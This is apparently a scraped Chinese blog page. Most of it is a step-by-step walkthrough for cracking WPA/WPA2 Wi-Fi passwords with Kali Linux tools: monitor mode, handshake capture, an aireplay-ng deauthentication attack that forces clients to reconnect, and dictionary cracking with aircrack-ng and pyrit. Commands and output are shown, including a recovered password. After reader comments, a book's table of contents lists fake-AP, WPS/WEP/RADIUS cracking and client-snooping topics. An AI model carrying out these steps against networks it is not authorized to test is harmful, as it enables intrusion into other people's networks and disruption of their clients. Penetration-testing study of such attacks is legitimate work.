Linux系统运维与架构
首先需要有一台运行kali linux的机器，无论是虚拟机或物理机，一块支持监听模式的无线网卡
root@kali:~# iwconfig
IEEE 802.11bg
ESSID:off/any
Mode:Managed
Access Point: Not-Associated
Tx-Power=20 dBm
Retry short limit:7
RTS thr:off
Fragment thr:off
Encryption key:off
Power Management:off
no wireless extensions.
no wireless extensions.
查看无线网卡设备名
root@kali:~# airmon-ng start wlan1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
wpa_supplicant
Realtek RTL8187L
rtl8187 - [phy0]
(monitor mode enabled on mon0)
进入监听模式
airodump-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的，copy下来BSSID
root@kali:~/test# airodump-ng -w nenew
-c 11 --bssid E4:D3:32:41:56:12
CH 11 ][ Elapsed: 1 min ][
23:31 ][ WPA handshake: E4:D3:32:41:56:12
#Data, #/s
CIPHER AUTH ESSID
E4:D3:32:41:56:12
54e. WPA2 CCMP
TP-LINK_5612
E4:D3:32:41:56:12
00:00:00:00:00:00
E4:D3:32:41:56:12
64:B4:73:40:60:5C
当看到WPA handshake:说明抓到了握手包，就可以来破解了
如果一直抓不到，可以用如下命令来攻击，强迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12
-c 64:B4:73:40:60:5C
--ignore-negative-one
抓到握手包后，就可以用字典来跑密码了。
root@kali:~/test# aircrack-ng -w ./password.txt
nenew-21.cap
Opening nenew-21.cap
Read 18654 packets.
Encryption
D0:C7:C0:6E:53:53
TP-LINK_5353
WPA (1 handshake)
Choosing first network as target.
Opening nenew-21.cap
Reading packets, please wait...
跑的速度如何取决于你机器的性能，更取决于你的字典
如果用物理机，有比较好的显卡，还可以用显卡来加速破解，效率比cpu高的多
kali linux下装显卡驱动，sdk等，参考如下链接
http://xiao106347./blog/static/4
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
.cn/s/blog_56a70c040101exje.html
我这里用显卡，很快就跑出了密码
root@kali:~# pyrit -r nenew-21.cap
-i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C)
Lukas Lueg
This code is distributed under the GNU General Public License v3+
Parsing file 'nenew-21.cap' (1/1)...
Parsed 14 packets (14 802.11-packets), got 1 AP(s)
Tried 4420221 PMK 86496 PMKs per second.
The password is 'qq123789'.
参考链接：/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html
转载请注明出处：
: Hi 博主，
你给的下载限速的例子，不是“限制*每个*客户端流量为800Kbits”， 而是...
: 我笔记本虚拟机安装的kali，在使用的时候需要加载本机上面的无线网卡，为什么加载不成功？？
: 路过，膜拜
: 您好，请问kali Linux下怎样安装 RTL8187 网卡驱动，能发我一份吗？
(59) (32) (8)Kali Linux无线网络渗透测试教程（大学霸内部资料）
时间： 11:22:45
&&&& 阅读：849
&&&& 评论：
&&&& 收藏：0
标签：&&&&&&&&&&&&&&&&&&&&&&&&&&&
Kali Linux无线网络渗透测试教程（大学霸内部资料）
介绍：本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试。教程包括无线网络监听、信息收集、路由器渗透测试、客户端渗透测试四大部分。内容涉及网络扫描、Wireshark抓包分析、WPS/WEP/WPA/WAP+Radius破解、漏洞扫描等技术。本教程基于Kali&Linux专门讲解针对无线网络WiFi如何进行渗透测试。其中，详细揭示了无线网络的各种安全缺陷和容易被利用的漏洞。
Kali Linux无线网络渗透测试
试读下载地址：/s/1bntTD4F
第1章 &搭建渗透测试环境 1
1.1 &什么是渗透测试 1
1.2 &安装Kali Linux操作系统 2
1.2.1 &在物理机上安装Kali Linux 2
1.2.2 &在VMware Workstation上安装Kali Linux 14
1.2.3 &安装VMware tools 18
1.2.4 &升级操作系统 19
1.3 &Kali Linux的基本配置 24
1.3.1 &配置软件源 24
1.3.2 &安装中文输入法 24
1.3.3 &虚拟机中使用USB设备 26
第2章 &WiFi网络的构成 30
2.1 &WiFi网络概述 30
2.1.1 &什么是WiFi网络 30
2.1.2 &WiFi网络结构 30
2.1.3 &WiFi工作原理 31
2.1.4 &AP常用术语概述 31
2.2 &802.11协议概述 32
2.2.1 &频段 32
2.2.2 &使用WirelessMon规划频段 33
2.2.3 &带宽 37
2.3 &配置无线AP 38
2.3.1 &在路由器上设置AP 38
2.3.2 &在随身WiFi上设置AP 40
第3章 &监听WiFi网络 43
3.1 &网络监听原理 43
3.1.1 &网卡的工作模式 43
3.1.2 &工作原理 43
3.2 &配置管理无线网卡 44
3.2.1 &Linux支持的无线网卡 44
3.2.2 &虚拟机使用无线网卡 46
3.2.3 &设置无线网卡 46
3.3 &设置监听模式 50
3.3.1 &Aircrack-ng工具介绍 50
3.3.2 &Aircrack-ng支持的网卡 51
3.3.3 &启动监听模式 52
3.4 &扫描网络范围 54
3.4.1 &使用airodump-ng扫描 54
3.4.2 &使用Kismet扫描 56
第4章 &捕获数据包 64
4.1 &数据包简介 64
4.1.1 &握手包 64
4.1.2 &非加密包 64
4.1.3 &加密包 64
4.2 &使用Wireshark捕获数据包 65
4.2.1 &捕获非加密模式的数据包 65
4.2.2 &捕获WEP加密模式的数据包 67
4.2.3 &捕获WPA-PSK/WPA2-PSK加密模式的数据包 72
4.3 &使用伪AP 74
4.3.1 &AP的工作模式 74
4.3.2 &创建伪AP 76
4.3.3 &强制客户端下线 81
4.3.4 &捕获数据包 81
第5章 &分析数据包 83
5.1 &Wireshark简介 83
5.1.1 &捕获过滤器 83
5.1.2 &显示过滤器 87
5.1.3 &数据包导出 90
5.1.4 &在Packet List面板增加无线专用列 94
5.2 &使用Wireshark 98
5.2.1 &802.11数据包结构 98
5.2.2 &分析特定BSSID包 101
5.2.3 &分析特定的包类型 102
5.2.4 &分析特定频率的包 103
5.3 &分析无线AP认证包 104
5.3.1 &分析WEP认证包 104
5.3.2 &分析WPA认证包 112
第6章 &获取信息 121
6.1 &AP的信息 121
6.1.1 &AP的SSID名称 121
6.1.2 &AP的MAC地址 123
6.1.3 &AP工作的信道 123
6.1.4 &AP使用的加密方式 124
6.2 &客户端的信息 126
6.2.1 &客户端连接的AP 126
6.2.2 &判断是否有客户端蹭网 128
6.2.3 &查看客户端使用的QQ号 131
6.2.4 &查看手机客户端是否有流量产生 133
第7章 &WPS加密模式 138
7.1 &WPS简介 138
7.1.1 &什么是WPS加密 138
7.1.2 &WPS工作原理 138
7.1.3 &WPS的漏洞 138
7.1.4 &WPS的优点和缺点 139
7.2 &设置WPS 139
7.2.1 &开启WPS功能 139
7.2.1 &在无线网卡上设置WPS加密 141
7.2.2 &在移动客户端上设置WPS加密 147
7.3 &破解WPS加密 153
7.3.1 &使用Reaver工具 153
7.3.2 &使用Wifite工具 156
7.3.3 &使用Fern WiFi Cracker工具 158
第8章 &WEP加密模式 161
8.1 &WEP加密简介 161
8.1.1 &什么是WEP加密 161
8.1.2 &WEP工作原理 161
8.1.3 &WEP漏洞分析 162
8.2 &设置WEP加密 163
8.2.1 &WEP加密认证类型 163
8.2.2 &在AP中设置WEP加密模式 164
8.3 &破解WEP加密 166
8.3.1 &使用Aircrack-ng工具 166
8.3.2 &使用Wifite工具破解WEP加密 169
8.3.3 &使用Gerix WiFi Cracker工具破解WEP加密 170
8.4 &应对措施 178
第9章 &WPA加密模式 181
9.1 &WPA加密简介 181
9.1.1 &什么是WPA加密 181
9.1.2 &WPA加密工作原理 182
9.1.3 &WPA弥补了WEP的安全问题 182
9.2 &设置WPA加密模式 183
9.2.1 &WPA认证类型 183
9.2.2 &加密算法 183
9.2.3 &设置AP为WPA加密模式 184
9.3 &创建密码字典 186
9.3.1 &使用Crunch工具 186
9.3.2 &使用pwgen工具 191
9.3.3 &创建彩虹表 192
9.4 &破解WPA加密 195
9.4.1 &使用Aircrack-ng工具 196
9.4.2 &使用Wifite工具破解WPA加密 199
9.4.3 &不指定字典破解WPA加密 200
9.5 &WPA的安全措施 201
第10章 &WPA+RADIUS加密模式 202
10.1 &RADIUS简介 202
10.1.1 &什么是RADIUS协议 202
10.1.2 &RADIUS的工作原理 202
10.2 &搭建RADIUS服务 203
10.2.1 &安装RADIUS服务 203
10.2.2 &配置文件介绍 206
10.3 &设置WPA+RADIUS加密 208
10.3.1 &配置RADIUS服务 208
10.3.2 &配置MySQL数据库服务 210
10.3.3 &配置WiFi网络 213
10.4 &连接RADIUS加密的WiFi网络 214
10.4.1 &在Windows下连接RADIUS加密的WiFi网络 215
10.4.2 &在Linux下连接RADIUS加密的WiFi网络 220
10.4.3 &移动客户端连接RADIUS加密的WiFi网络 222
10.5 &破解RADIUS加密的WiFi网络 223
10.5.1 &使用hostapd-wpe创建伪AP 223
10.5.2 &Kali Linux的问题处理 227
10.5.3 &使用asleap破解密码 228
10.6 &WPA+RADIUS的安全措施 228
标签：&&&&&&&&&&&&&&&&&&&&&&&&&&&原文：http://my.oschina.net/u/1585857/blog/360766
教程昨日排行
&&国之画&&&& &&&&&&
&& &&&&&&&&&&&&&&
鲁ICP备号-4
打开技术之扣，分享程序人生！}